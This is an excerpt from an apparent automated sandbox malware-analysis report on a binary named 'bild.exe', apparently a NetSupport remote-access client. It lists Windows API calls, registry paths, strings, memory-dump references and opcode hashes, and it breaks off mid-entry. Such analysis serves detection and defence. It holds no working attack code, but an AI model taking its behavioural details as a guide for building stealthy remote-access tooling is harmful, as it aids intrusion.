                                                                                                              APIs
                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
                                                                                                              • CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
                                                                                                              • CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                              • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                                              • API String ID: 3360349984-1136101629
                                                                                                              • Opcode ID: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
                                                                                                              • Instruction ID: 7cf91fcea6c2a3c5c2684f5d08a561b662f4dc7f01f0c277a0d6c7245401f800
                                                                                                              • Opcode Fuzzy Hash: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
                                                                                                              • Instruction Fuzzy Hash: E7015E7A7443166FE3209EA9CC86F57FBA8DB44764F104128FA25962C4DA60F805CB64
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: wsprintf
                                                                                                              • String ID: %s%s%s.bin$927537$_HF$_HW$_SW
                                                                                                              • API String ID: 2111968516-3164854316
                                                                                                              • Opcode ID: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
                                                                                                              • Instruction ID: 34a826dfca0d5743c415d593f242b0f3cefc790b54bbadf5113738552eb06063
                                                                                                              • Opcode Fuzzy Hash: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
                                                                                                              • Instruction Fuzzy Hash: 93E092A1D1870C6FF70085589C15F9EFAE87B4978EFC48051BEEDA7292E935D60082D6
                                                                                                              APIs
                                                                                                              • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11102B03
                                                                                                              • GetStockObject.GDI32(00000004), ref: 11102B5B
                                                                                                              • RegisterClassA.USER32(?), ref: 11102B6F
                                                                                                              • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 11102BAC
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                                              • String ID: NSMDesktopWnd
                                                                                                              • API String ID: 2669163067-206650970
                                                                                                              • Opcode ID: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
                                                                                                              • Instruction ID: 4c07b853b75387a4d851a66abc04609236edd6d81c14be1d28904dd9f6a0e6ac
                                                                                                              • Opcode Fuzzy Hash: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
                                                                                                              • Instruction Fuzzy Hash: C231F4B0D15619AFDB44CFA9D980A9EFBF4FB08314F50962EE46AE3640E7346900CF94
                                                                                                              APIs
                                                                                                              • KillTimer.USER32(00000000,00000000,TermUI...), ref: 1113CC9A
                                                                                                              • KillTimer.USER32(00000000,00007F62,TermUI...), ref: 1113CCB3
                                                                                                              • FreeLibrary.KERNEL32(75B40000,?,TermUI...), ref: 1113CD2B
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,TermUI...), ref: 1113CD43
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeKillLibraryTimer
                                                                                                              • String ID: TermUI
                                                                                                              • API String ID: 2006562601-4085834059
                                                                                                              • Opcode ID: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
                                                                                                              • Instruction ID: 1c615ec055e307fcecd6c2f5a0081f3099d40e524c959ad3afbad8c7da76a6da
                                                                                                              • Opcode Fuzzy Hash: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
                                                                                                              • Instruction Fuzzy Hash: 813182B46121329FE605DF9ACDE496EFB6ABBC4B1C750402BF4689720CE770A845CF91
                                                                                                              APIs
                                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseOpen
                                                                                                              • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                                              • API String ID: 47109696-3245241687
                                                                                                              • Opcode ID: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                                              • Instruction ID: 3a61aca8bf2f26e8be4db12f87e0943ca7983303b4b50086f785ef97d0623835
                                                                                                              • Opcode Fuzzy Hash: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                                              • Instruction Fuzzy Hash: 56218875E0422A9BE760DB64CD80B9EF7B8EB44708F1042AAD85DF7540E771AD458BB0
                                                                                                              APIs
                                                                                                                • Part of subcall function 11111430: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                                                • Part of subcall function 11111430: __wsplitpath.LIBCMT ref: 11111475
                                                                                                                • Part of subcall function 11111430: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                                              • GetComputerNameA.KERNEL32(?,?), ref: 11111578
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                                              • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                                              • API String ID: 806825551-1858614750
                                                                                                              • Opcode ID: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                                              • Instruction ID: bd5304e3d9974d7ab46afc427c644d654ac0d4b62daaa3d8a48381b774377c4d
                                                                                                              • Opcode Fuzzy Hash: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                                              • Instruction Fuzzy Hash: 4B214676A142491BD701CF309D80BBFFFBA9F8B249F080578D852DB145E626D914C391
                                                                                                              APIs
                                                                                                                • Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                                                • Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Pictures\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                                              • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144255
                                                                                                              • ResetEvent.KERNEL32(0000024C), ref: 11144269
                                                                                                              • SetEvent.KERNEL32(0000024C), ref: 1114427F
                                                                                                              • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 1114428E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                                              • String ID: MiniDump
                                                                                                              • API String ID: 1494854734-2840755058
                                                                                                              • Opcode ID: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                                              • Instruction ID: 829689d5ebdc208bf7b78735a50f5ce9a06f611da5f38dced1c13c8e9b13f18e
                                                                                                              • Opcode Fuzzy Hash: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                                              • Instruction Fuzzy Hash: 4F113875E5422677E300DFF99C81F9AF768AB44B28F200230EA24D75C4EB71A504C7B1
                                                                                                              APIs
                                                                                                                • Part of subcall function 6C795000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C795014
                                                                                                                • Part of subcall function 6C795000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C798E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C795034
                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6C798EAE
                                                                                                              • FreeLibrary.KERNEL32(?), ref: 6C798EBF
                                                                                                                • Part of subcall function 6C792420: _strrchr.LIBCMT ref: 6C79242E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180719718.000000006C791000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C790000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180699601.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180775211.000000006C7D9000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180831579.000000006C7E0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_6c790000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressCloseFileFreeHandleLibraryModuleNameProc_strrchr
                                                                                                              • String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
                                                                                                              • API String ID: 3215810784-3459472706
                                                                                                              • Opcode ID: 9de2ebe2f66ec8409bd9970dc801464bd3847a03cfa2b4413a3e234d6eb4876a
                                                                                                              • Instruction ID: fd96bd16eb5af3b3c5a778e90fa50a30889cc27f315344cd9d9ce0221ecd6f4c
                                                                                                              • Opcode Fuzzy Hash: 9de2ebe2f66ec8409bd9970dc801464bd3847a03cfa2b4413a3e234d6eb4876a
                                                                                                              • Instruction Fuzzy Hash: 8711B671B012159BEF109A61FE59FEA7378AB05309F044466DE19E7A40EB31BA48CB61
                                                                                                              APIs
                                                                                                              • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 11146DCF
                                                                                                              • wsprintfA.USER32 ref: 11146E06
                                                                                                                • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                                              • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                                              • API String ID: 1985783259-2296142801
                                                                                                              • Opcode ID: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
                                                                                                              • Instruction ID: b1a6c5171231f01418375ac6f2de6c12625a8d09d3611db16d7d0d369645f93a
                                                                                                              • Opcode Fuzzy Hash: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
                                                                                                              • Instruction Fuzzy Hash: FA11A5FAE00128ABC720DB65ED81FAAF77C9B4461DF000565EB19B6141EA35AA05C7A8
                                                                                                              APIs
                                                                                                              • _malloc.LIBCMT ref: 1110F439
                                                                                                                • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                                                • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                                                • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                                              • wsprintfA.USER32 ref: 1110F454
                                                                                                                • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                              • _memset.LIBCMT ref: 1110F477
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                                                              • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                                              • API String ID: 3234921582-2664294811
                                                                                                              • Opcode ID: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                                              • Instruction ID: e8e28b36a5a63397ef775e95fa380a20e388029766e4784519104262db02a7f0
                                                                                                              • Opcode Fuzzy Hash: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                                              • Instruction Fuzzy Hash: 1CF0F6B5E0012863C720AFA5AC06FEFF37C9F91658F440169EE04A7241EA71BA11C7E9
                                                                                                              APIs
                                                                                                                • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
                                                                                                                • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                                                • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                                                • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                                              • LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030690,00000002), ref: 11145AFF
                                                                                                              • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 11145B11
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,11030690,00000002), ref: 11145B24
                                                                                                              Strings
                                                                                                              Memory Dump Source
